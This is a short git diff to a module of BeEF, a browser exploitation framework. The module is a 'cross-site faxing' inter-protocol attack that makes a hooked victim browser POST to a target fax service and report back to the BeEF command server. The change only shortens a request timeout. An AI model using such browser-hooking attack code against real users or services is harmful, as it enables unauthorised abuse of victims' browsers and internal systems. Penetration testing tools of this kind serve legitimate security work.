diff --git a/modules/ipec/cross_site_faxing/command.js b/modules/ipec/cross_site_faxing/command.js index 2fb19bdca..4676339a1 100644 --- a/modules/ipec/cross_site_faxing/command.js +++ b/modules/ipec/cross_site_faxing/command.js @@ -21,7 +21,7 @@ beef.execute(function() { xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.send(post_body); - setTimeout(function(){xhr.abort()}, 5000); + setTimeout(function(){xhr.abort()}, 2000); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent'); });